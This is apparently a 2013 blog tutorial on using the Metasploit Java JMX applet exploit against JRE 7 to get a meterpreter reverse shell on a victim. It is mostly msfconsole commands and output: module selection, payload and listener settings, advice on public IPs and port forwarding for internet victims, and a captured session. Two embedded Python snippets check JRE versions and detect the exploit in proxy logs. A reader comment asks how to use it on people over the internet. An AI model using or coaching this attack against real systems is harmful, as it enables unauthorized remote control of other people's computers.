Hack windows/linux/mac with metasploit | Java Applet JMX Remote Code Execution


Java Applet JMX Remote Code Execution

Java exploits are client-side exploits that mostly target browsers to run arbitrary commands on the system. These exploits are put up on a webpage in the form of a Java applet. When a victim visits the URL and allows the applet to run, the Java runtime (JRE) is exploited to execute arbitrary commands on the system and gain control of it.

The "JMX Remote Code Execution" exploit is a recent one that was exploited a lot in Feb 2013. It abuses the JMX classes from within a Java applet. The vulnerability is present in Sun Java JRE 7 up to update 11. This is a generic JRE exploit, which means that it works on any OS and any browser that is running the vulnerable JRE version.

PoC code for the exploit has been posted here.

Exploit with metasploit

Search for the java exploit.

msf > search exploit java multi browser

Matching Modules
================

   Name                                                                  Disclosure Date          Rank       Description
   ----                                                                  ---------------          ----       -----------
   exploit/multi/browser/firefox_escape_retval                           2009-07-13 00:00:00 UTC  normal     Firefox 3.5 escape() Return Value Memory Corruption
   exploit/multi/browser/firefox_xpi_bootstrapped_addon                  2007-06-27 00:00:00 UTC  excellent  Mozilla Firefox Bootstrapped Addon Social Engineering Code Execution
   exploit/multi/browser/java_atomicreferencearray                       2012-02-14 00:00:00 UTC  excellent  Java AtomicReferenceArray Type Violation Vulnerability
   exploit/multi/browser/java_calendar_deserialize                       2008-12-03 00:00:00 UTC  excellent  Sun Java Calendar Deserialization Privilege Escalation
   exploit/multi/browser/java_getsoundbank_bof                           2009-11-04 00:00:00 UTC  great      Sun Java JRE getSoundbank file:// URI Buffer Overflow
   exploit/multi/browser/java_jre17_exec                                 2012-08-26 00:00:00 UTC  excellent  Java 7 Applet Remote Code Execution
   exploit/multi/browser/java_jre17_glassfish_averagerangestatisticimpl  2012-10-16 00:00:00 UTC  excellent  Java Applet AverageRangeStatisticImpl Remote Code Execution
   exploit/multi/browser/java_jre17_jaxws                                2012-10-16 00:00:00 UTC  excellent  Java Applet JAX-WS Remote Code Execution
   exploit/multi/browser/java_jre17_jmxbean                              2013-01-10 00:00:00 UTC  excellent  Java Applet JMX Remote Code Execution
   exploit/multi/browser/java_jre17_jmxbean_2                            2013-01-19 00:00:00 UTC  excellent  Java Applet JMX Remote Code Execution
   exploit/multi/browser/java_jre17_method_handle                        2012-10-16 00:00:00 UTC  excellent  Java Applet Method Handle Remote Code Execution
   exploit/multi/browser/java_rhino                                      2011-10-18 00:00:00 UTC  excellent  Java Applet Rhino Script Engine Remote Code Execution
   exploit/multi/browser/java_rmi_connection_impl                        2010-03-31 00:00:00 UTC  excellent  Java RMIConnectionImpl Deserialization Privilege Escalation
   exploit/multi/browser/java_setdifficm_bof                             2009-11-04 00:00:00 UTC  great      Sun Java JRE AWT setDiffICM Buffer Overflow
   exploit/multi/browser/java_signed_applet                              1997-02-19 00:00:00 UTC  excellent  Java Signed Applet Social Engineering Code Execution
   exploit/multi/browser/java_trusted_chain                              2010-03-31 00:00:00 UTC  excellent  Java Statement.invoke() Trusted Method Chain Privilege Escalation
   exploit/multi/browser/java_verifier_field_access                      2012-06-06 00:00:00 UTC  excellent  Java Applet Field Bytecode Verifier Cache Remote Code Execution
   exploit/multi/browser/mozilla_navigatorjava                           2006-07-25 00:00:00 UTC  normal     Mozilla Suite/Firefox Navigator Object Code Execution
   exploit/multi/browser/qtjava_pointer                                  2007-04-23 00:00:00 UTC  excellent  Apple QTJava toQTPointer() Arbitrary Memory Access
   exploit/multi/misc/batik_svg_java                                     2012-05-11 00:00:00 UTC  excellent  Squiggle 1.7 SVG Browser Java Code Execution
   exploit/windows/browser/imgeviewer_tifmergemultifiles                 2010-03-03 00:00:00 UTC  normal     Viscom Image Viewer CP Pro 8.0/Gold 6.0 ActiveX Control
   exploit/windows/browser/java_docbase_bof                              2010-10-12 00:00:00 UTC  great      Sun Java Runtime New Plugin docbase Buffer Overflow
   exploit/windows/browser/ms05_054_onload                               2005-11-21 00:00:00 UTC  normal     MS05-054 Microsoft Internet Explorer JavaScript OnLoad Handler Remote Code Execution
   exploit/windows/browser/teechart_pro                                  2011-08-11 00:00:00 UTC  normal     TeeChart Professional ActiveX Control <= 2010.0.0.3 Trusted Integer Dereference

The exploit we want is this one:

exploit/multi/browser/java_jre17_jmxbean_2

Use the info command to get the description:

This module abuses the JMX classes from a Java Applet to run 
  arbitrary Java code outside of the sandbox as exploited in the wild 
  in February of 2013. Additionally, this module bypasses default 
  security settings introduced in Java 7 Update 10 to run unsigned 
  applet without displaying any warning to the user.

Setup a vulnerable system

To test out this exploit we need a vulnerable system. For this I have set up Windows XP with Sun Java JRE 7u10, that is, Java runtime version 7 update 10. Note that this exploit will not work on Java version 6. It works only on version 7 up to update 11. The JRE installation file name is "jre-7u10-windows-i586.exe". Download it from somewhere and install it.
As for the browser, any browser should work fine.
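A defender-side counterpart of this setup step, added here as an example and not code from the original post: a small check that parses `java -version` banners and flags the affected range the post gives (JRE 7 up to update 11; anything that is not major version 7 is reported as not affected). The sample banners are constructed.

```python
import re

# Matches the classic version string, e.g.  java version "1.7.0_10"
# or  openjdk version "1.8.0_292"; group 1 = major, group 2 = update.
_VERSION_RE = re.compile(r'version "1\.(\d+)\.\d+(?:_(\d+))?"')

def parse_java_version(banner: str):
    """Return (major, update) from `java -version` output, e.g. (7, 10).

    A banner without an update suffix (e.g. "1.7.0") is treated as update 0.
    Returns None if the banner is not in the familiar 1.x.y_u form.
    """
    m = _VERSION_RE.search(banner)
    if not m:
        return None
    major = int(m.group(1))
    update = int(m.group(2)) if m.group(2) else 0
    return major, update

def is_vulnerable_to_jmxbean(banner: str, last_bad_update: int = 11) -> bool:
    """True when the banner is JRE 7 at or below the last affected update.

    The post gives the affected range as Java 7 up to update 11 and says
    Java 6 is not affected, so only major version 7 is considered here.
    """
    parsed = parse_java_version(banner)
    if parsed is None:
        return False
    major, update = parsed
    return major == 7 and update <= last_bad_update

if __name__ == "__main__":
    # Constructed sample banners, not real inventory data.
    samples = [
        'java version "1.7.0_10"\nJava(TM) SE Runtime Environment (build 1.7.0_10-b18)',
        'java version "1.7.0_11"',
        'java version "1.7.0_13"',
        'java version "1.6.0_43"',
        'java version "1.7.0"',
        'openjdk version "1.8.0_292"',
    ]
    for s in samples:
        verdict = "VULNERABLE" if is_vulnerable_to_jmxbean(s) else "ok"
        print(s.splitlines()[0], "->", verdict)
```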

Select exploit

msf > use exploit/multi/browser/java_jre17_jmxbean_2

Check the options

msf exploit(java_jre17_jmxbean_2) > show options

Module options (exploit/multi/browser/java_jre17_jmxbean_2):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   SRVHOST     0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT     8080             yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH                      no        The URI to use for this exploit (default is random)


Exploit target:

   Id  Name
   --  ----
   0   Generic (Java Payload)


msf exploit(java_jre17_jmxbean_2) >

SRVHOST and SRVPORT are the host and port on which a web server will be run to serve the exploit webpage with the applet. Ideally the port number should be 80, so that the port need not be mentioned in the URL, but in this case we shall use 8080. SRVHOST can be left at 0.0.0.0, which makes the server listen on all of the local machine's addresses. Set URIPATH to / so that the URL is short.

msf exploit(java_jre17_jmxbean_2) > set URIPATH /

Select payload

Next check the payloads compatible with this exploit.

msf exploit(java_jre17_jmxbean_2) > show payloads

Compatible Payloads
===================

   Name                            Disclosure Date  Rank    Description
   ----                            ---------------  ----    -----------
   generic/custom                                   normal  Custom Payload
   generic/shell_bind_tcp                           normal  Generic Command Shell, Bind TCP Inline
   generic/shell_reverse_tcp                        normal  Generic Command Shell, Reverse TCP Inline
   java/meterpreter/bind_tcp                        normal  Java Meterpreter, Java Bind TCP Stager
   java/meterpreter/reverse_http                    normal  Java Meterpreter, Java Reverse HTTP Stager
   java/meterpreter/reverse_https                   normal  Java Meterpreter, Java Reverse HTTPS Stager
   java/meterpreter/reverse_tcp                     normal  Java Meterpreter, Java Reverse TCP Stager
   java/shell/bind_tcp                              normal  Command Shell, Java Bind TCP Stager
   java/shell/reverse_tcp                           normal  Command Shell, Java Reverse TCP Stager
   java/shell_reverse_tcp                           normal  Java Command Shell, Reverse TCP Inline

msf exploit(java_jre17_jmxbean_2) >

We are going to use java/meterpreter/reverse_tcp

msf exploit(java_jre17_jmxbean_2) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf exploit(java_jre17_jmxbean_2) >

Check the options once again.

msf exploit(java_jre17_jmxbean_2) > show options

Module options (exploit/multi/browser/java_jre17_jmxbean_2):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   SRVHOST     0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT     8080             yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH                      no        The URI to use for this exploit (default is random)


Payload options (java/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Generic (Java Payload)


msf exploit(java_jre17_jmxbean_2) >

Now the payload options are visible in the options list. LHOST and LPORT are the host and port on which the reverse shell handler will listen. The important thing to note here is that LHOST and LPORT must be reachable by the victim machine. On a local network, LHOST can be set to your LAN IP (for example 192.168.1.33). Over the internet, however, the victim machine connects to you through your public internet IP, so in that case LHOST should be your public internet IP address. And if your (attacker) machine is behind a router, port forwarding must be set up properly for LPORT, so that incoming connections are sent on to LPORT on your machine.

msf exploit(java_jre17_jmxbean_2) > set LHOST 192.168.1.33
LHOST => 192.168.1.33
msf exploit(java_jre17_jmxbean_2) > set LPORT 5555
LPORT => 5555
msf exploit(java_jre17_jmxbean_2) >

Now that we have set up our options correctly, it's time to run the exploit.

msf exploit(java_jre17_jmxbean_2) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.33:5555 
[*] Using URL: http://0.0.0.0:8080/
msf exploit(java_jre17_jmxbean_2) > [*]  Local IP: http://192.168.1.33:8080/
[*] Server started.

Metasploit informs us that the reverse shell handler has been started and that the server which serves the Java exploit page has also been started. The victim now has to open the URL "http://192.168.1.33:8080/" for the Java exploit to run. Once the Java applet is loaded and run, the exploit fires and Metasploit gets a meterpreter session.

So go to your vulnerable machine and open the URL in a browser.

Meterpreter

Once the URL is opened, Metasploit will start sending the exploit, the payload and so on, and if everything goes fine, a meterpreter session should start.

msf exploit(java_jre17_jmxbean_2) > 
[*] 192.168.1.4      java_jre17_jmxbean_2 - handling request for /
[*] 192.168.1.4      java_jre17_jmxbean_2 - Sending HTML
[*] 192.168.1.4      java_jre17_jmxbean_2 - handling request for /favicon.ico
[*] 192.168.1.4      java_jre17_jmxbean_2 - handling request for /lEUioG.jar
[*] 192.168.1.4      java_jre17_jmxbean_2 - Sending JAR
[*] 192.168.1.4      java_jre17_jmxbean_2 - handling request for /lEUioG.jar
[*] 192.168.1.4      java_jre17_jmxbean_2 - Sending JAR
[*] 192.168.1.4      java_jre17_jmxbean_2 - handling request for /java/lang/ClassBeanInfo.class
[*] 192.168.1.4      java_jre17_jmxbean_2 - handling request for /java/lang/ObjectBeanInfo.class
[*] 192.168.1.4      java_jre17_jmxbean_2 - handling request for /java/lang/ObjectCustomizer.class
[*] 192.168.1.4      java_jre17_jmxbean_2 - handling request for /java/lang/ClassCustomizer.class
[*] Sending stage (30246 bytes) to 192.168.1.4
[*] Meterpreter session 1 opened (192.168.1.33:5555 -> 192.168.1.4:1065) at 2013-05-16 23:01:46 -0700

So the meterpreter session started successfully.
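The request sequence in the server log above (the HTML page, then the randomly named JAR, then lookups for java/lang/*BeanInfo.class and *Customizer.class that the JRE makes while the applet runs) is also what a defender sees in a web proxy log. Added here as an example, not code from the original post: a detection that flags a client which fetches a .jar and then requests those java/lang helper classes from the same host. The proxy log lines are constructed in a simplified "client method url status" form.

```python
import re
from collections import defaultdict

# Constructed proxy log lines modelled on the msfconsole output above.
SAMPLE_PROXY_LOG = """\
192.168.1.4 GET http://192.168.1.33:8080/ 200
192.168.1.4 GET http://192.168.1.33:8080/favicon.ico 404
192.168.1.4 GET http://192.168.1.33:8080/lEUioG.jar 200
192.168.1.4 GET http://192.168.1.33:8080/java/lang/ClassBeanInfo.class 404
192.168.1.4 GET http://192.168.1.33:8080/java/lang/ObjectBeanInfo.class 404
192.168.1.4 GET http://192.168.1.33:8080/java/lang/ObjectCustomizer.class 404
192.168.1.4 GET http://192.168.1.33:8080/java/lang/ClassCustomizer.class 404
192.168.1.7 GET http://intranet.example/app/ui.jar 200
192.168.1.7 GET http://intranet.example/app/images/logo.png 200
"""

LINE_RE = re.compile(r'^(\S+) (\S+) (\S+) (\d{3})$')
# A browser asking a web server for BeanInfo/Customizer helper classes of
# java.lang types is the tell-tale pattern from the log above.
CORE_LOOKUP_RE = re.compile(r'/java/lang/\w+(?:BeanInfo|Customizer)\.class$')

def parse_proxy_log(text):
    """Yield (client, method, url, status) tuples; malformed lines are skipped."""
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            yield m.group(1), m.group(2), m.group(3), int(m.group(4))

def find_applet_introspection(text, min_lookups=2):
    """Return {client: [urls]} for clients that pulled a .jar from a host and
    then requested at least min_lookups java/lang helper classes from it."""
    jar_hosts = defaultdict(set)   # client -> hosts it fetched a .jar from
    hits = defaultdict(list)
    for client, _method, url, _status in parse_proxy_log(text):
        host = url.split('/', 3)[2] if '://' in url else ''
        if url.lower().endswith('.jar'):
            jar_hosts[client].add(host)
        elif CORE_LOOKUP_RE.search(url) and host in jar_hosts[client]:
            hits[client].append(url)
    return {c: urls for c, urls in hits.items() if len(urls) >= min_lookups}

if __name__ == "__main__":
    for client, urls in find_applet_introspection(SAMPLE_PROXY_LOG).items():
        print(f"{client}: {len(urls)} java/lang helper-class lookups after a JAR fetch")
```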

msf exploit(java_jre17_jmxbean_2) > sessions -l

Active sessions
===============

  Id  Type                   Information               Connection
  --  ----                   -----------               ----------
  1   meterpreter java/java  enlightened @ ----------  192.168.1.33:5555 -> 192.168.1.4:1065 (192.168.1.4)

msf exploit(java_jre17_jmxbean_2) > session -i 1
[-] Unknown command: session.
msf exploit(java_jre17_jmxbean_2) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > pwd
C:\Program Files\Google\Chrome\Application\26.0.1410.64

We have successfully hacked the victim machine. Play with it!!

Last Updated On : 21st May 2013


About Silver Moon

PHP developer, blogger and Linux enthusiast. He can be reached at m00n.silv3r@gmail.com. Or find him on

  • Alex

    I did
    srvhost = my internal ip
    lhost = public ip
    lport = 55
    and I use a simple modem device to use the internet, but when I sent the link to someone over the internet, it does NOTHING.
    What should I do to use it over the internet?
    When I use it on another computer connected to the same network, it works perfectly though.
